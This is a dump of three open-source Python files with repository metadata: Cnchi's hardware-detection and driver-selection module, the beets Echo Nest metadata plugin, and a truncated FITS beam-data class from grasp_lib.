Wyn10/Cnchi
|
cnchi/hardware/hardware.py
|
1
|
14779
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# hardware.py
#
# Copyright © 2013-2016 Antergos
#
# This file is part of Cnchi.
#
# Cnchi is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# Cnchi is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# The following additional terms are in effect as per Section 7 of the license:
#
# The preservation of all legal notices and author attributions in
# the material or in the Appropriate Legal Notices displayed
# by works containing it is required.
#
# You should have received a copy of the GNU General Public License
# along with Cnchi; If not, see <http://www.gnu.org/licenses/>.
""" Hardware related packages installation """
import logging
import os
import subprocess
_HARDWARE_PATH = '/usr/share/cnchi/cnchi/hardware'
class Hardware(object):
""" This is an abstract class. You need to use this as base """
def __init__(self, class_name=None, class_id=None, vendor_id=None,
devices=None, priority=-1, enabled=True):
self.class_name = class_name
self.class_id = class_id
self.vendor_id = vendor_id
self.devices = devices
self.priority = priority
self.enabled = enabled
self.product_id = ""
def get_packages(self):
""" Returns all necessary packages to install """
raise NotImplementedError("get_packages is not implemented")
@staticmethod
def get_conflicts():
""" Returns a list with all conflicting packages """
return []
def post_install(self, dest_dir):
""" This method runs commands that need to be run AFTER installing the driver """
pass
def pre_install(self, dest_dir):
""" This method runs commands that need to run BEFORE installing the driver """
pass
def check_device(self, class_id, vendor_id, product_id):
""" Checks if the driver supports this device """
if not self.enabled:
return False
if self.class_id and class_id != self.class_id:
return False
if self.vendor_id and vendor_id != self.vendor_id:
return False
if self.devices and product_id not in self.devices:
return False
return True
def detect(self):
""" Tries to guess if a device suitable for this driver is present,
used in features screen """
if not self.enabled:
return False
# Get PCI devices
try:
cmd = ["lspci", "-n"]
lines = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
lines = lines.decode().split("\n")
except subprocess.CalledProcessError as err:
logging.warning("Cannot detect hardware components : %s", err.output.decode())
return False
for line in lines:
if len(line) > 0:
class_id = "0x{0}".format(line.split()[1].rstrip(":")[0:2])
if class_id == self.class_id:
dev = line.split()[2].split(":")
vendor_id = "0x{0}".format(dev[0])
product_id = "0x{0}".format(dev[1])
if vendor_id == self.vendor_id and product_id in self.devices:
return True
return False
@staticmethod
def is_proprietary():
""" Proprietary drivers are drivers for your hardware devices
that are not freely-available or open source, and must be
obtained from the hardware manufacturer. """
return False
def is_graphic_driver(self):
""" Tells us if this is a graphic driver or not """
if self.class_id == "0x03":
return True
else:
return False
def get_name(self):
""" Returns class name """
return self.class_name
def get_priority(self):
""" Get module (driver) priority """
return self.priority
@staticmethod
def chroot(cmd, dest_dir, stdin=None, stdout=None):
""" Runs command inside the chroot """
run = ['chroot', dest_dir]
for element in cmd:
run.append(element)
try:
proc = subprocess.Popen(run,
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
out = proc.communicate()[0]
logging.debug(out.decode())
except OSError as err:
logging.error("Error running command: %s", err.strerror)
def __str__(self):
return "class name: {0}, class id: {1}, vendor id: {2}, product id: {3}".format(
self.class_name,
self.class_id,
self.vendor_id,
self.product_id)
def call_script(self, script_path, dest_dir):
""" Helper function that will run a script """
if os.path.exists(script_path):
cmd = [
"/usr/bin/bash",
script_path,
dest_dir,
self.class_name]
try:
subprocess.check_output(cmd, timeout=300)
logging.debug("Script '%s' completed successfully.", script_path)
except subprocess.CalledProcessError as err:
# Even though Post-install script call has failed we
# will try to continue with the installation.
logging.error(
"Error running %s script, command %s failed: %s",
script_path,
err.cmd,
err.output)
except subprocess.TimeoutExpired as timeout_error:
logging.error(timeout_error)
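# --- Illustrative sketch (added for clarity; not part of the original Cnchi sources) ---
# A minimal driver module would subclass Hardware roughly like this; the
# class/vendor/device ids and the package name below are placeholders.
class _ExampleDriver(Hardware):
""" Skeleton showing the interface a real driver module implements """
def __init__(self):
Hardware.__init__(
self, class_name="example_driver", class_id="0x03",
vendor_id="0x1234", devices=["0xabcd"], priority=0)
def get_packages(self):
return ["example-driver-package"]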
class HardwareInstall(object):
""" This class checks user's hardware
If 'use_proprietary_graphic_drivers' is True, this module will try to
install the proprietary variants of the graphic drivers available
(only if the hardware is detected). For non graphical drivers,
the open one is always chosen as the default.
"""
def __init__(self, use_proprietary_graphic_drivers=False):
self.use_proprietary_graphic_drivers = use_proprietary_graphic_drivers
# All available objects
self.all_objects = []
# All objects that support devices found
# (can have more than one object for each device)
self.objects_found = {}
# All objects that are really used
self.objects_used = []
dirs = os.listdir(_HARDWARE_PATH)
# We scan the folder for py files.
# This is unsafe, but we don't care if
# somebody wants Cnchi to run arbitrary code.
for filename in dirs:
non_valid = ["__init__.py", "hardware.py"]
if filename.endswith(".py") and filename not in non_valid:
filename = filename[:-len(".py")]
name = ""
try:
if __name__ == "__main__":
package = filename
else:
package = "hardware." + filename
name = filename.capitalize()
# This instruction is the same as "from package import name"
class_name = getattr(__import__(package, fromlist=[name]), "CLASS_NAME")
obj = getattr(__import__(package, fromlist=[class_name]), class_name)()
self.all_objects.append(obj)
except ImportError as err:
logging.error("Error importing %s from %s : %s", name, package, err)
except Exception as ex:
logging.error("Unexpected error importing %s", package)
template = "An exception of type {0} occured. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
logging.error(message)
try:
# Detect devices
devices = self.get_devices()
except subprocess.CalledProcessError as err:
txt = "Unable to scan devices, command {0} failed: {1}"
txt = txt.format(err.cmd, err.output.decode())
logging.error(txt)
return
logging.debug(
"Cnchi will test %d drivers for %d hardware devices",
len(self.all_objects),
len(devices))
# Find objects that support the devices we've found.
self.objects_found = {}
for obj in self.all_objects:
for device in devices:
(class_id, vendor_id, product_id) = device
check = obj.check_device(
class_id=class_id,
vendor_id=vendor_id,
product_id=product_id)
if check:
logging.debug(
"Driver %s is needed by (%s, %s, %s)",
obj.class_name, class_id, vendor_id, product_id)
# print("Driver", obj.class_name, "is needed by", class_id, vendor_id, product_id)
if device not in self.objects_found:
self.objects_found[device] = [obj]
else:
self.objects_found[device].append(obj)
self.objects_used = []
for device in self.objects_found:
drivers_available = self.objects_found[device]
objects_selected = []
if len(drivers_available) > 1:
# We have more than one driver for this device!
# We'll need to choose one
# Check if there is a proprietary driver
is_one_closed = False
for driver in drivers_available:
if driver.is_proprietary():
is_one_closed = True
break
for driver in drivers_available:
if not driver.is_graphic_driver():
# For non graphical drivers, we choose the open one as default
if not driver.is_proprietary():
objects_selected.append(driver)
else:
# It's a graphic driver
# We choose the open one if the user does not want to
# use proprietary (or if all the ones available are open)
if not self.use_proprietary_graphic_drivers or not is_one_closed:
# OK, we choose the open one
if not driver.is_proprietary():
objects_selected.append(driver)
else:
# One of them is proprietary and user wants to use it
if driver.is_proprietary():
objects_selected.append(driver)
if len(objects_selected) > 1:
# We still have two or more options,
# let's check their priority
priorities = []
for driver in objects_selected:
priorities.append(driver.get_priority())
for driver in objects_selected:
if driver.get_priority() == max(priorities):
self.objects_used.append(driver)
break
else:
self.objects_used.extend(objects_selected)
else:
# Only one option, add it (it doesn't matter if it's open or not)
self.objects_used.append(drivers_available[0])
@staticmethod
def get_devices():
""" Gets a list of all pci/usb devices """
devices = []
# Get PCI devices
cmd = ["/usr/bin/lspci", "-n"]
lines = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
lines = lines.decode().split("\n")
for line in lines:
if len(line) > 0:
class_id = line.split()[1].rstrip(":")[0:2]
dev = line.split()[2].split(":")
devices.append(("0x" + class_id, "0x" + dev[0], "0x" + dev[1]))
# Get USB devices
cmd = ["/usr/bin/lsusb"]
lines = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
lines = lines.decode().split("\n")
for line in lines:
if len(line) > 0:
dev = line.split()[5].split(":")
devices.append(("0", "0x" + dev[0], "0x" + dev[1]))
return devices
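# --- Worked example (added for clarity; not part of the original source) ---
# A typical `lspci -n` line looks like:
#   00:02.0 0300: 8086:0116 (rev 09)
# which the first loop turns into ("0x03", "0x8086", "0x0116"), while an
# `lsusb` line such as:
#   Bus 001 Device 002: ID 8087:0024 Intel Corp.
# becomes ("0", "0x8087", "0x0024").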
def get_packages(self):
""" Get pacman package list for all detected devices """
packages = []
for obj in self.objects_used:
packages.extend(obj.get_packages())
# Remove duplicates (not necessary but it's cleaner)
packages = list(set(packages))
return packages
def get_conflicts(self):
""" Get all conflicting packages for all detected devices """
packages = []
for obj in self.objects_used:
packages.extend(obj.get_conflicts())
# Remove duplicates (not necessary but it's cleaner)
packages = list(set(packages))
return packages
def get_found_driver_names(self):
""" Returns a list of found driver names """
driver_names = []
for obj in self.objects_used:
driver_names.append(obj.get_name())
return driver_names
def pre_install(self, dest_dir):
""" Run pre install commands for all detected devices """
for obj in self.objects_used:
obj.pre_install(dest_dir)
def post_install(self, dest_dir):
""" Run post install commands for all detected devices """
for obj in self.objects_used:
obj.post_install(dest_dir)
def test():
""" Test module function """
def _(text):
""" Helper function """
return text
hardware_install = HardwareInstall(use_proprietary_graphic_drivers=False)
# hardware_install = HardwareInstall(use_proprietary_graphic_drivers=True)
hardware_pkgs = hardware_install.get_packages()
print(hardware_install.get_found_driver_names())
if len(hardware_pkgs) > 0:
txt = " ".join(hardware_pkgs)
print("Hardware module added these packages :")
print(txt)
if __name__ == "__main__":
test()
|
gpl-3.0
| -156,210,725,189,507,170
| 36.507614
| 102
| 0.546353
| false
| 4.461957
| false
| false
| false
|
andremiller/beets
|
beetsplug/echonest.py
|
1
|
17229
|
# This file is part of beets.
# Copyright 2015, Adrian Sampson.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Fetch a variety of acoustic metrics from The Echo Nest.
"""
import time
import socket
import os
import tempfile
from string import Template
import subprocess
from beets import util, config, plugins, ui
from beets.dbcore import types
import pyechonest
import pyechonest.song
import pyechonest.track
# If a request at the EchoNest fails, we want to retry the request RETRIES
# times and wait between retries for RETRY_INTERVAL seconds.
RETRIES = 10
RETRY_INTERVAL = 10
DEVNULL = open(os.devnull, 'wb')
ALLOWED_FORMATS = ('MP3', 'OGG', 'AAC')
UPLOAD_MAX_SIZE = 50 * 1024 * 1024
# FIXME: use avconv?
CONVERT_COMMAND = u'ffmpeg -i $source -y -acodec libvorbis -vn -aq 2 $dest'
TRUNCATE_COMMAND = u'ffmpeg -t 300 -i $source '\
u'-y -acodec libvorbis -vn -aq 2 $dest'
# Maps attribute names from echonest to their field names in beets.
# The attributes are retrieved from a songs `audio_summary`. See:
# http://echonest.github.io/pyechonest/song.html#pyechonest.song.profile
ATTRIBUTES = {
'energy': 'energy',
'liveness': 'liveness',
'speechiness': 'speechiness',
'acousticness': 'acousticness',
'danceability': 'danceability',
'valence': 'valence',
'tempo': 'bpm',
}
# Types for the flexible fields added by `ATTRIBUTES`
FIELD_TYPES = {
'energy': types.FLOAT,
'liveness': types.FLOAT,
'speechiness': types.FLOAT,
'acousticness': types.FLOAT,
'danceability': types.FLOAT,
'valence': types.FLOAT,
}
MUSICAL_SCALE = ['C', 'C#', 'D', 'D#', 'E', 'F',
'F#', 'G', 'G#', 'A', 'A#', 'B']
# We also use echonest_id (song_id) and echonest_fingerprint to speed up
# lookups.
ID_KEY = 'echonest_id'
FINGERPRINT_KEY = 'echonest_fingerprint'
def _splitstrip(string, delim=u','):
"""Split string (at commas by default) and strip whitespace from the
pieces.
"""
return [s.strip() for s in string.split(delim)]
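# Worked example (added for clarity): _splitstrip(u"rock, jazz ,  blues")
# returns [u'rock', u'jazz', u'blues'].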
def diff(item1, item2):
"""Score two Item objects according to the Echo Nest numerical
fields.
"""
result = 0.0
for attr in ATTRIBUTES.values():
if attr == 'bpm':
# BPM (tempo) is handled specially to normalize.
continue
try:
result += abs(
float(item1.get(attr, None)) -
float(item2.get(attr, None))
)
except TypeError:
result += 1.0
try:
bpm1 = float(item1.get('bpm', None))
bpm2 = float(item2.get('bpm', None))
result += abs(bpm1 - bpm2) / max(bpm1, bpm2, 1)
except TypeError:
result += 1.0
return result
def similar(lib, src_item, threshold=0.15, fmt='${difference}: ${path}'):
for item in lib.items():
if item.path != src_item.path:
d = diff(item, src_item)
if d < threshold:
s = fmt.replace('${difference}', '{:2.2f}'.format(d))
ui.print_obj(item, lib, s)
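# --- Worked example (added for clarity; not part of the original source) ---
# For two items whose energy values differ by 0.2, whose other non-tempo
# attributes are identical, and whose tempos are 120 vs 90 BPM, diff()
# returns 0.2 + |120 - 90| / max(120, 90, 1) = 0.2 + 0.25 = 0.45, so the
# pair would not count as similar under the default threshold of 0.15.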
class EchonestMetadataPlugin(plugins.BeetsPlugin):
item_types = FIELD_TYPES
def __init__(self):
super(EchonestMetadataPlugin, self).__init__()
self.config.add({
'auto': True,
'apikey': u'NY2KTZHQ0QDSHBAP6',
'upload': True,
'convert': True,
'truncate': True,
})
self.config.add(ATTRIBUTES)
pyechonest.config.ECHO_NEST_API_KEY = \
self.config['apikey'].get(unicode)
if self.config['auto']:
self.import_stages = [self.imported]
def _echofun(self, func, **kwargs):
"""Wrapper for requests to the EchoNest API. Will retry up to
RETRIES times and wait between retries for RETRY_INTERVAL
seconds.
"""
for i in range(RETRIES):
try:
result = func(**kwargs)
except pyechonest.util.EchoNestAPIError as e:
if e.code == 3:
# reached access limit per minute
self._log.debug(u'rate-limited on try {0}; waiting {1} '
u'seconds', i + 1, RETRY_INTERVAL)
time.sleep(RETRY_INTERVAL)
elif e.code == 5:
# specified identifier does not exist
# no use in trying again.
self._log.debug(u'{0}', e)
return None
else:
self._log.error(u'{0}', e.args[0][0])
return None
except (pyechonest.util.EchoNestIOError, socket.error) as e:
self._log.warn(u'IO error: {0}', e)
time.sleep(RETRY_INTERVAL)
except Exception as e:
# there was an error analyzing the track, status: error
self._log.debug(u'{0}', e)
return None
else:
break
else:
# If we exited the loop without breaking, then we used up all
# our allotted retries.
self._log.error(u'request failed repeatedly')
return None
return result
def _pick_song(self, songs, item):
"""Helper method to pick the best matching song from a list of songs
returned by the EchoNest. Compares artist, title and duration. If
the artist and title match and the duration difference is <= 2.5
seconds, it's considered a match.
"""
if not songs:
self._log.debug(u'no songs found')
return
pick = None
min_dist = item.length
for song in songs:
if song.artist_name.lower() == item.artist.lower() \
and song.title.lower() == item.title.lower():
dist = abs(item.length - song.audio_summary['duration'])
if dist < min_dist:
min_dist = dist
pick = song
if min_dist > 2.5:
return None
return pick
def _flatten_song(self, song):
"""Given an Echo Nest song object, return a flat dict containing
attributes we care about. If song is None, return None.
"""
if not song:
return
values = dict(song.audio_summary)
values['id'] = song.id
return values
# "Profile" (ID-based) lookup.
def profile(self, item):
"""Do a lookup on the EchoNest by MusicBrainz ID.
"""
# Use an existing Echo Nest ID.
if ID_KEY in item:
enid = item[ID_KEY]
# Look up the Echo Nest ID based on the MBID.
else:
if not item.mb_trackid:
self._log.debug(u'no ID available')
return
mbid = 'musicbrainz:track:{0}'.format(item.mb_trackid)
track = self._echofun(pyechonest.track.track_from_id,
identifier=mbid)
if not track:
self._log.debug(u'lookup by MBID failed')
return
enid = track.song_id
# Use the Echo Nest ID to look up the song.
songs = self._echofun(pyechonest.song.profile, ids=enid,
buckets=['id:musicbrainz', 'audio_summary'])
return self._flatten_song(self._pick_song(songs, item))
# "Search" (metadata-based) lookup.
def search(self, item):
"""Search the item at the EchoNest by artist and title.
"""
songs = self._echofun(pyechonest.song.search, title=item.title,
results=100, artist=item.artist,
buckets=['id:musicbrainz', 'tracks',
'audio_summary'])
return self._flatten_song(self._pick_song(songs, item))
# "Analyze" (upload the audio itself) method.
def prepare_upload(self, item):
"""Truncate and convert an item's audio file so it can be
uploaded to echonest.
Return a ``(source, tmp)`` tuple where `source` is the path to
the file to be uploaded and `tmp` is a temporary file to be
deleted after the upload or `None`.
If conversion or truncation fails, return `None`.
"""
source = item.path
tmp = None
if item.format not in ALLOWED_FORMATS:
if self.config['convert']:
tmp = source = self.convert(source)
if not tmp:
return
if os.stat(source).st_size > UPLOAD_MAX_SIZE:
if self.config['truncate']:
source = self.truncate(source)
if tmp is not None:
util.remove(tmp)
tmp = source
else:
return
if source:
return source, tmp
def convert(self, source):
"""Converts an item in an unsupported media format to ogg. Config
pending.
This is stolen from Jakob Schnitzer's convert plugin.
"""
fd, dest = tempfile.mkstemp(u'.ogg')
os.close(fd)
self._log.info(u'encoding {0} to {1}',
util.displayable_path(source),
util.displayable_path(dest))
opts = []
for arg in CONVERT_COMMAND.split():
arg = arg.encode('utf-8')
opts.append(Template(arg).substitute(source=source, dest=dest))
# Run the command.
try:
util.command_output(opts)
except (OSError, subprocess.CalledProcessError) as exc:
self._log.debug(u'encode failed: {0}', exc)
util.remove(dest)
return
self._log.info(u'finished encoding {0}', util.displayable_path(source))
return dest
def truncate(self, source):
"""Truncates an item to a size less than UPLOAD_MAX_SIZE."""
fd, dest = tempfile.mkstemp(u'.ogg')
os.close(fd)
self._log.info(u'truncating {0} to {1}',
util.displayable_path(source),
util.displayable_path(dest))
opts = []
for arg in TRUNCATE_COMMAND.split():
arg = arg.encode('utf-8')
opts.append(Template(arg).substitute(source=source, dest=dest))
# Run the command.
try:
util.command_output(opts)
except (OSError, subprocess.CalledProcessError) as exc:
self._log.debug(u'truncate failed: {0}', exc)
util.remove(dest)
return
self._log.info(u'truncate encoding {0}', util.displayable_path(source))
return dest
def analyze(self, item):
"""Upload the item to the EchoNest for analysis. May require to
convert the item to a supported media format.
"""
prepared = self.prepare_upload(item)
if not prepared:
self._log.debug(u'could not prepare file for upload')
return
source, tmp = prepared
self._log.info(u'uploading file, please be patient')
track = self._echofun(pyechonest.track.track_from_filename,
filename=source)
if tmp is not None:
util.remove(tmp)
if not track:
self._log.debug(u'failed to upload file')
return
# Sometimes we have a track but no song. I guess this happens for
# new / unverified songs. We need to "extract" the audio_summary
# from the track object manually. I don't know why the
# pyechonest API handles tracks (merge audio_summary to __dict__)
# and songs (keep audio_summary in an extra attribute)
# differently.
# Maybe a patch for pyechonest could help?
# First get the (limited) metadata from the track in case
# there's no associated song.
from_track = {}
for key in ATTRIBUTES:
try:
from_track[key] = getattr(track, key)
except AttributeError:
pass
from_track['duration'] = track.duration
# Try to look up a song for the full metadata.
try:
song_id = track.song_id
except AttributeError:
return from_track
songs = self._echofun(pyechonest.song.profile,
ids=[song_id], track_ids=[track.id],
buckets=['audio_summary'])
if songs:
pick = self._pick_song(songs, item)
if pick:
return self._flatten_song(pick)
return from_track # Fall back to track metadata.
# Shared top-level logic.
def fetch_song(self, item):
"""Try all methods to get a matching song object from the
EchoNest. If no method succeeds, return None.
"""
# There are four different ways to get a song. Each method is a
# callable that takes the Item as an argument.
methods = [self.profile, self.search]
if self.config['upload']:
methods.append(self.analyze)
# Try each method in turn.
for method in methods:
song = method(item)
if song:
self._log.debug(u'got song through {0}: {1} - {2} [{3}]',
method.__name__,
item.artist,
item.title,
song.get('duration'),
)
return song
def apply_metadata(self, item, values, write=False):
"""Copy the metadata from the dictionary of song information to
the item.
"""
# Update each field.
for k, v in values.iteritems():
if k in ATTRIBUTES:
field = ATTRIBUTES[k]
self._log.debug(u'metadata: {0} = {1}', field, v)
if field == 'bpm':
item[field] = int(v)
else:
item[field] = v
if 'key' in values and 'mode' in values:
key = MUSICAL_SCALE[values['key']]  # Echo Nest keys are 0-based pitch classes (0 = C)
if values['mode'] == 0: # Minor key
key += 'm'
item['initial_key'] = key
if 'id' in values:
enid = values['id']
self._log.debug(u'metadata: {0} = {1}', ID_KEY, enid)
item[ID_KEY] = enid
# Write and save.
if write:
item.try_write()
item.store()
# Automatic (on-import) metadata fetching.
def imported(self, session, task):
"""Import pipeline stage.
"""
for item in task.imported_items():
song = self.fetch_song(item)
if song:
self.apply_metadata(item, song)
# Explicit command invocation.
def requires_update(self, item):
"""Check if this item requires an update from the EchoNest (its
data is missing).
"""
for field in ATTRIBUTES.values():
if not item.get(field):
return True
self._log.info(u'no update required')
return False
def commands(self):
fetch_cmd = ui.Subcommand('echonest',
help='Fetch metadata from the EchoNest')
fetch_cmd.parser.add_option(
'-f', '--force', dest='force', action='store_true', default=False,
help='(re-)download information from the EchoNest'
)
def fetch_func(lib, opts, args):
self.config.set_args(opts)
write = config['import']['write'].get(bool)
for item in lib.items(ui.decargs(args)):
self._log.info(u'{0} - {1}', item.artist, item.title)
if self.config['force'] or self.requires_update(item):
song = self.fetch_song(item)
if song:
self.apply_metadata(item, song, write)
fetch_cmd.func = fetch_func
sim_cmd = ui.Subcommand('echosim', help='show related files')
sim_cmd.parser.add_option(
'-t', '--threshold', dest='threshold', action='store',
type='float', default=0.15, help='Set difference threshold'
)
sim_cmd.parser.add_option(
'-f', '--format', action='store', default='${difference}: ${path}',
help='print with custom format'
)
def sim_func(lib, opts, args):
self.config.set_args(opts)
for item in lib.items(ui.decargs(args)):
similar(lib, item, opts.threshold, opts.format)
sim_cmd.func = sim_func
return [fetch_cmd, sim_cmd]
|
mit
| -5,006,644,330,438,449,000
| 33.527054
| 79
| 0.546346
| false
| 4.023587
| true
| false
| false
|
MicheleMaris/grasp_lib
|
stokesCubeMap.py
|
1
|
16416
|
VERSION='V 1.4 - 2014 Jun 4 - '
from grid2d import MapGrid
class stokesCubeMap :
def __init__(self,*Arg) :
import numpy as np
arm_alias={'x':'S','y':'M'}
self._nameRIMO=None
self._angularCut=None
self._Nsamples=-1
self.File = []
self.Component = []
self.Instrument = []
self.Channel = []
self.Horn = []
self.Arm = []
self.FreqCode = []
self.Version = []
self.FreqMHz = []
self.Polarization = []
self.Beamdata=[]
self.BeamdataQ=[]
self.BeamdataU=[]
self.BeamdataV=[]
self.header={}
if len(Arg) < 2 :
self._arm=None
self._LstFileName=None
return
self._arm=Arg[0]
self._LstFileName=Arg[1]
for k in open(self._LstFileName,'r') :
kk=k.split('/')[-1].split('.')[0].split('_')
if kk[4]==self._arm :
self.File.append(k.split('.')[0]+'.stokes')
self.Component.append(kk[0])
self.Instrument.append(kk[1])
self.Channel.append(kk[2])
self.Horn.append(kk[3])
self.Arm.append(kk[4])
self.FreqCode.append(kk[5])
self.Version.append(kk[6])
self.FreqMHz.append(float(kk[5][1:]))
self.Polarization.append(arm_alias[kk[4]])
for k in self.keys() : self.__dict__[k]=np.array(self.__dict__[k])
def fill_from_fits(self) :
import numpy as np
self.Beamdata=[]
self.BeamdataQ=[]
self.BeamdataU=[]
self.BeamdataV=[]
self.header={}
isFirst=True
for k in self.File :
print k
p,x,b,q,u,v = self.get_fits(k)
self.Beamdata.append(b)
self.BeamdataQ.append(q)
self.BeamdataU.append(u)
self.BeamdataV.append(v)
if isFirst :
self.header={'p':p,'x':x}
isFirst=False
for k in ['','Q','U','V'] :
nn='Beamdata'+k
self.__dict__[nn]=np.array(self.__dict__[nn]).transpose()
self._Nsamples=self.Beamdata.shape[0]
def fitsType(self) :
if self.header['x'].has_key('HIERARCH Nx') :
return 'grd'
else :
return 'cut'
def getGeometry(self) :
import numpy as np
if self.fitsType()=='grd' :
return
else :
geom={}
for k in ['objType','Ntheta','Nphi','Mintheta','Maxtheta'] :
geom[k]=self.header['x']['HIERARCH '+k]
geom['colat']=np.rad2deg(np.arange(geom['Ntheta'])*(geom['Maxtheta']-geom['Mintheta'])/float(geom['Ntheta']-1)+geom['Mintheta'])
geom['long']=np.arange(geom['Nphi'])/float(geom['Nphi']-1)*360.
return geom
def apply_angularCut(self,angularCut) :
import numpy as np
if self.fitsType()=='grd' : return
if angularCut == None : return
self._angularCut=angularCut
gg=self.getGeometry()
idx=np.where(gg['colat']<self._angularCut)[0].max()
imax=idx*gg['Nphi']+gg['Nphi']
self.Beamdata[:imax,:]=0
self.BeamdataQ[:imax,:]=0
self.BeamdataU[:imax,:]=0
self.BeamdataV[:imax,:]=0
def __len__(self) :
return len(self.FreqMHz)
def __getitem__(self,this) :
return self.__dict__[this]
def keys(self) :
l=[]
for k in self.__dict__.keys() :
if k[0]!='_' : l.append(k)
return l
def copy(self) :
import copy
return copy.deepcopy(self)
def argslice(self,idx) :
out=self.copy()
for k in self.keys() :
out.__dict__[k]=self.__dict__[k][idx]
return out
def get_fits(self,File,ihdu=1,fitsfile=None) :
import pyfits
if fitsfile == None :
t=pyfits.open(File)
else :
t=fitsfile
p=t[0].header
x=t[ihdu].header
b=t[ihdu].data.field('Beamdata')
q=t[ihdu].data.field('BeamdataQ')
u=t[ihdu].data.field('BeamdataU')
v=t[ihdu].data.field('BeamdataV')
if fitsfile == None :
t.close()
return p,x,b,q,u,v
def _template(self) :
import numpy as np
return self.Beamdata.shape
def isGRD(self) :
"Returns True if the file is a GRD"
return self.header['x'].has_key('HIERARCH Nx')
def Nelements(self) :
return self.header['x']['NAXIS2']
def NrowsNcols(self) :
"returns the number of rows and cols"
if self.isGRD() :
return (self.header['x']['HIERARCH Ny'],self.header['x']['HIERARCH Nx'])
return (self.header['x']['HIERARCH Ntheta'],self.header['x']['HIERARCH Nphi'])
def reshape2d(self) :
"reshape to 2d the matrices"
for k in self.keys() :
self.__dict__[k].shape=self.NrowsNcols()
def reshape1d(self) :
"reshape to 1d the matrices"
for k in self.keys() :
self.__dict__[k].shape=self.__dict__[k].size
def rows_cols_idx(self) :
"returns the maps of rows and cols index"
import numpy as np
nr,nc=self.NrowsNcols()
row=np.zeros([nr,nc])
for k in range(nr) : row[k,:]=k
row.shape=self.Nelements()
col=np.zeros([nr,nc])
for k in range(nc) : col[:,k]=k
col.shape=self.Nelements()
return row,col
def rows_cols_values(self) :
"returns the maps of rows and cols values"
import numpy as np
nr,nc=self.NrowsNcols()
row=np.zeros([nr,nc])
for k in range(nr) : row[k,:]=k
row.shape=self.Nelements()
col=np.zeros([nr,nc])
for k in range(nc) : col[:,k]=k
col.shape=self.Nelements()
return row,col
def interp(self,idx,FreqMHz) :
import numpy as np
b=np.interp(FreqMHz,self.FreqMHz,self.Beamdata[idx])
q=np.interp(FreqMHz,self.FreqMHz,self.BeamdataQ[idx])
u=np.interp(FreqMHz,self.FreqMHz,self.BeamdataU[idx])
v=np.interp(FreqMHz,self.FreqMHz,self.BeamdataV[idx])
return b,q,u,v
def resample(self,FreqMHz) :
import copy
import numpy as np
out=stokesCubeMap()
out.header=self.header
out.FreqMHz=FreqMHz
out._Nsamples=self._Nsamples
out.Beamdata = np.zeros([self._Nsamples,len(out.FreqMHz)])
out.BeamdataQ = np.zeros([self._Nsamples,len(out.FreqMHz)])
out.BeamdataU = np.zeros([self._Nsamples,len(out.FreqMHz)])
out.BeamdataV = np.zeros([self._Nsamples,len(out.FreqMHz)])
for ii in range(self._Nsamples) :
b,q,u,v=self.interp(ii,out.FreqMHz)
out.Beamdata[ii]=b
out.BeamdataQ[ii]=q
out.BeamdataU[ii]=u
out.BeamdataV[ii]=v
return out
def average(self,FreqMHz,Weight,Method=None,nameRIMO=None) :
import numpy as np
import time
import copy
out=stokesCubeMap()
out.File=copy.deepcopy(self.File)
out._angularCut=self._angularCut
out.header=self.header
out.Beamdata = np.zeros([self._Nsamples])
out.BeamdataQ = np.zeros([self._Nsamples])
out.BeamdataU = np.zeros([self._Nsamples])
out.BeamdataV = np.zeros([self._Nsamples])
out._Nsamples=0
dw=(FreqMHz[1:]-FreqMHz[:-1])*0.5
out._Norm=((Weight[1:]+Weight[:-1])*dw).sum()
out._Method=Method
tic=time.time()
for ii in range(self._Nsamples) :
b,q,u,v=self.interp(ii,FreqMHz)
xx=b*Weight ; out.Beamdata[ii] = ((xx[1:]+xx[:-1])*dw).sum()/out._Norm
xx=q*Weight ; out.BeamdataQ[ii] = ((xx[1:]+xx[:-1])*dw).sum()/out._Norm
xx=u*Weight ; out.BeamdataU[ii] = ((xx[1:]+xx[:-1])*dw).sum()/out._Norm
xx=v*Weight ; out.BeamdataV[ii] = ((xx[1:]+xx[:-1])*dw).sum()/out._Norm
out._elapsed_time=time.time()-tic
out._Method=Method
out._nameRIMO=nameRIMO
return out
def tofits(self,fitsname,Author='M.Maris',creator='',version='',doNotWrite=False,clobber=True) :
"saves the file in fits"
import numpy as np
from collections import OrderedDict
import pyfits
from SmartTable import dict2fits
import time
import copy
#o=pyfits.open(fitsname)
out = OrderedDict()
out['Beamdata']=np.array(self['Beamdata'],dtype='float32')
out['BeamdataQ']=np.array(self['BeamdataQ'],dtype='float32')
out['BeamdataU']=np.array(self['BeamdataU'],dtype='float32')
out['BeamdataV']=np.array(self['BeamdataV'],dtype='float32')
T=dict2fits.Table(out)
#T.header=copy.deepcopy(self.header['x'])
T.header.update('TUNIT1',self.header['x']['TUNIT1'])
T.header.update('TUNIT2',self.header['x']['TUNIT2'])
T.header.update('TUNIT3',self.header['x']['TUNIT3'])
T.header.update('TUNIT4',self.header['x']['TUNIT4'])
#
#test whether the original file was a GRD or a CUT file
print ' copying Header'
if self.header['x'].has_key('HIERARCH Nx') :
# a grd file
for k in ['objType','Nx','Ny','Xcentre','Ycentre','Xdelta','Ydelta'] :
T.header.update('HIERARCH '+k,self.header['x']['HIERARCH '+k])
print " %s : '%s' in '%s'"%(k,self.header['x']['HIERARCH '+k],T.header['HIERARCH '+k])
else :
# a CUT file
for k in ['objType','Ntheta','Nphi','Mintheta','Maxtheta'] :
T.header.update('HIERARCH '+k,self.header['x']['HIERARCH '+k])
print " %s : '%s' in '%s'"%(k,self.header['x']['HIERARCH '+k],T.header['HIERARCH '+k])
print
